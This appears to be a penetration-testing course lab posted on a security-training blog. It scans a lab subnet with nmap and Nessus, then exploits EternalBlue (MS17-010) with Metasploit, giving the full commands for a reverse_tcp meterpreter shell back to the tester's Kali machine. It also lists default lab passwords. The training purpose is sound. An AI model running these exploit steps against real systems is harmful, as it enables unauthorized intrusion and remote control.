Powered by Blogger.
Home » » Module 06: Network Penetration Testing Methodology-Internal 9

Module 06: Network Penetration Testing Methodology-Internal 9

Written By AKADEMY on Wednesday, July 3, 2019 | 11:18 AM

Exercise 9: Exploiting Windows OS Vulnerability

Scenario

Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access.
As an expert penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus tool.
Lab Duration30 Minutes
  1. Click Kali Linux (Internal Network). If the Kali Linux lock screen appears, click on the screen and press Enter. If it does not appear, skip to the next task.
    Screenshot
  2. Type root in the Username field and click Next.
    Screenshot
  3. Type toor in the Password field and click Sign In.
    Screenshot
  4. In this lab, we will be scanning a subnet for live machines. Select one machine and pentest the machine to gain access to it.
    For doing a quick scan, we will do a ping sweep using Nmap. In this lab, we are choosing an internal network (Subnet D) for pentesting.
    Launch a command line terminal, type nmap -sP 172.20.20.1-255 and press Enter.
    This displays all the hosts that are up in the network within a minute. In this lab, we are choosing 172.20.20.9 (Advertisement Dept. Subnet D) as our target.
    Screenshot
  5. Now, we shall scan the Advertisement Dept. Subnet D machines to view the open ports, services running along with their versions, and the underlying operating system.
    Type nmap -T4 -A 172.20.20.9 and press Enter.
    Nmap takes approximately 3 minutes to complete the scan. Upon scan completion, you will observe that the port 445 is open and the underlying operating system is Windows Server 2008 R2.
    Close the terminal.
    Screenshot
  6. Now, we shall perform a vulnerability scan on Advertisement Dept. Subnet D using Nessus in Windows Server 2012 (Internal Network).
    You may additionally look for pre-existing vulnerabilities associated with the identified version of services/operating system in searchsploit/exploit-db.
  7. Click Windows Server 2012 (Internal Network)and click Ctrl+Alt+Delete.
    Screenshot
  8. In the password field click Pa$$w0rd and press Enter.
    You can use the Type Password option from the Commands menu to enter the password.
    Screenshot
  9. To launch the Firefox browser, double-click the Firefox icon on the Desktop.
    You can also click the Firefox icon on the taskbar or launch it from the Start menu apps.
    Screenshot
  10. Firefox main window appears, now type https://localhost:8834 in the address bar of firefox and press Enter.
    Screenshot
  11. A webpage appears stating that your connection is not secure. Click Advanced.
    Screenshot
  12. Click Add Exception… button.
    Screenshot
  13. Add Security Exception window appears; click Confirm Security Exception.
    Screenshot
  14. The Nessus/Login page appears.
    Type the following credentials and click Sign In:
    Username: admin
    Password: qwerty@123
    If the login page does not appear, go to Control Panel --> Administrative Tools --> Services and restart Tenable Nessusservice. Once done, reload the webpage.
    Screenshot
  15. After successful login, go to Nessus Policieswindow and click Create a new policy link.
    If any notifications appear at the top right corner of the window, ignore them.
    Nessus will automatically log off if you leave the browser window idle for 5 mins.
    Screenshot
  16. Policy Templates window appears with Scanner Templates as shown in the screenshot below.
    Screenshot
  17. In the Scanner section, click Advanced Scanpolicy.
    Screenshot
  18. Advanced Scan policy window appears displaying the Settings tab.
    In the Basic settings under the General section, specify a policy name in the Name field (here, System_Scan) and give a description of the policy.
    Once done, leave the Permissions section with the default setting and click on Discovery in the left pane.
    In this lab, we will be scanning Advertisement Dept Subnet D machine (Windows Server 2008).
    Screenshot
  19. Once you click on DISCOVERY, it will drop-down a list of 3 options i.e., Host Discovery, Port Scanning, and Service Discovery. Now we are going to configure Host Discovery settings.
    In the Host Discovery settings, toggle the Ping Remote Host option to turn it off.
    Scroll down if you want to view the rest of the settings in Host Discovery module.
    Screenshot
  20. In the Port Scanning module, check the Verify open TCP ports found by local port enumerators option.
    Leaving the other settings to default, click ASSESSMENT from the left pane.
    Screenshot
  21. Once you click the ASSESSMENT module, it will show you the General settings where you can see the Accuracy, Antivirus definition grace period, and SMTP options. Here you can leave the settings to default, and click Brute Force from the left pane.
    Screenshot
  22. In the Brute Force settings, make sure that the Only use credentials provided by the useroption is checked under General Settings section, and then, click the Web Applications module in the left pane.
    Screenshot
  23. In the Web Application module, if you have any web applications hosted on the network, turn it ON or leave the settings to default, and then click the Windows module from the left pane. In this lab, we have left the settings to default (Turned off) as there is no web application hosted on the target machine.
    You can turn On the by toggling the Scan web applications switch.
    Screenshot
  24. In Windows module, make sure that Request Information about the SMB Domain is checked, and leave the other settings to default. Now click on the REPORT module from the left pane.
    You can also specify the Start UID and End UID in Enumerate Domain Users and Local Users.
    Screenshot
  25. In the REPORT module, leave all the settings to default and click ADVANCED from the left pane.
    Screenshot
  26. In the Advanced module, scroll down to Performance Options section and set the value for Max simultaneous hosts per scan as 100Max number of concurrent TCP sessions per host as unlimited and Max number of concurrent TCP sessions per scan as unlimited. After configuring these options, scroll up the window and click on the Credentials module.
    Screenshot
  27. In the Credentials module, it will display the Cloud Services, Database, Host, Miscellaneous, and Plaintext Authentication options. Here you can activate these options by choosing them from the left pane.
    In this lab, we have kept the settings to default. Now, click on the Plugins module to view the available plugins.
    Screenshot
  28. In the Plugins module, Nessus display all the plugins and their information. Here you may choose plugins according to your target network and then, click Save button to save the new policy.
    In this lab, we are not selecting any plugins.
    Screenshot
  29. Now the created policy is saved in the Policiessection as shown in the screenshot below:
    Screenshot
  30. To begin a new scan, click My Scans in the left pane.
    Screenshot
  31. Click Create a New Scan link to create a new scan.
    Screenshot
  32. Once you click on the New Scan button, it will redirect you to Scan Templates window, where you need to select the policy you have created.
    The created policy is present in User Defined Policies section, so click on the User Definedtab.
    Screenshot
  33. User Defined policy section appears, click System Scan policy.
    Screenshot
  34. The Settings section of the Scan Templates appears.
    Set a name for the scan in the Name Text field (here, Advertisement Dept.), type a description for the scan in the Description field, leave the Folder field set to default and enter the IP address of Advertisement Dept. machine in the Targets text field (here, 172.20.20.9).
    Click on the Schedule module in the left pane.
    You can specify a multiple number of machines to scan using Nessus. For lab demonstration, we are using a single machine.
    Screenshot
  35. The Schedule section allows you to specify the frequency of the scan. In this section, you can specify how often you want Nessus to scan the target machine.
    Leave this setting to default, click on the Savedrop-down menu and click Launch. This will launch a vulnerability scan on the Advertisement Dept. Subnet D machine.
    Screenshot
  36. As soon as you click the Launch link, Nessus will begin the scan on the Advertisement Dept. Subnet D machine as shown in the screenshot below.
    It will take around 10 minutes to scan the machine.
    Screenshot
  37. Once the scan is completed, it will display a tickmark as shown in the screenshot.
    Screenshot
  38. Click Advertisement Dept. to view the scan result.
    Screenshot
  39. Click on 172.20.20.9 to view all the vulnerabilities associated with it.
    Screenshot
  40. A list of vulnerabilities is displayed for this host as shown in the screenshot below:
    Screenshot
  41. Click Export and select a format (here, HTML) in order to export the result.
    Screenshot
  42. The Export as HTML pop-up appears, choose Executive Summary from the drop-down list and click on the Export button.
    Screenshot
  43. A dialog box appears, asking you to either open or save the file. Click Save File and click OK.
    Screenshot
  44. Now, click on folder icon (Open Containing Folder) from notification popup that appears after completion of the download.
    The file will be downloaded in the default download location of browser i.e., C:\Users\Administrator\Downloads.
    Screenshot
  45. Double-click on the downloaded file to view the result.
    If you are asked How do you want to open this type of file (.html)?, choose a web browser to view the report. In this lab, we are using Firefox(1st icon in the list) browser.
    Screenshot
  46. The generated report appears as shown in the screenshot. Click Show Details to view the complete details of the vulnerabilities.
    Scroll down to analyze the complete report.
    Screenshot
  47. Now, we shall choose a vulnerability found in the target machine and attempt to exploit it using a Metasploit module. In this lab, we shall exploit a recently discovered vulnerability (Eternal Blue) associated with the MS:17-010 (CVE ID: 2017-0143). Before performing the exploitation, ensure that victim machine Advertisement Dept. Subnet D is powered On.
    Switch back to Kali Linux (Internal Network)machine.
    Screenshot
  48. Launch a Command Line Terminal from the taskbar.
    Screenshot
  49. Type msfconsole command and press Enter to launch the Metasploit framework console.
    Now, we shall check if the Advertisement Dept. Subnet D machine is vulnerable to Eternal Blue using smb_ms17_010 auxiliary scanner.
    Screenshot
  50. Type use auxiliary/scanner/smb/smb_ms17_010 in the msfconsole and press Enter to use the module.
    Screenshot
  51. Now, type set rhosts 172.20.20.9 and press Enter to set the target as Advertisement Dept. Subnet D.
    Screenshot
  52. Type run and press Enter to check if the machine is vulnerable.
    You will observe that Advertisement Dept. Subnet D (Windows Server 2008) is vulnerable to Eternal Blue as shown in the screenshot below:
    Screenshot
  53. Now, we shall search for the Eternal Blue exploit. Type search eternal blue in the msfconsole and press Enter. This displays the scanner and the exploit associated with Eternal Blue as shown in the screenshot.
    We will be using the eternalblue_doublepulsarexploit to compromise the target machine.
    Screenshot
  54. Type use exploit/windows/smb/eternalblue_doublepulsarin msfconsole and press Enter.
    Screenshot
  55. Now, type show options and press Enter to view all the options associated with the exploit.
    Screenshot
  56. So, we got to know from the previous step that we need to set the values of RHOSTprocessinject and targetarchitecture. Setting windows/x64/meterpreter/reverse_tcp payload increases the chance of gaining meterpreter session.
    Issue the following commands in the msfconsole:
    1. set rhost 172.20.20.9
    2. set processinject lsass.exe
    3. set targetarchitecture x64
    4. set payload windows/x64/meterpreter/reverse_tcp
    5. set lhost 172.20.20.21
    172.20.20.21 is the IP address of the Kali Linux (Internal Network) machine.
    Screenshot
  57. Since we have set the options required for the exploit module, we will now perform exploitation on the target machine by triggering the exploit.
    So, type exploit and press Enter.
    Screenshot
  58. A meterpreter session has been attained, meaning that we have successfully exploited the smb vulnerability in the target machine using the Eternal Blue exploit.
    Sometimes, the options you set might not fetch you the meterpreter session. In such cases, you need to change the processinject and targetarchitecturevalues and perform the exploitation again.
    If you change the targetarchitecture, you need to change the architecture of the payload as well.
    Screenshot
  59. We have successfully exploited the smb vulnerability found in the target machine. Take a screenshot of the boot screen which appeared in the previous step and save it to the respective pentesting directory.
You have successfully scanned a network for vulnerabilities.
Share this article :

0 comments:

Post a Comment

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT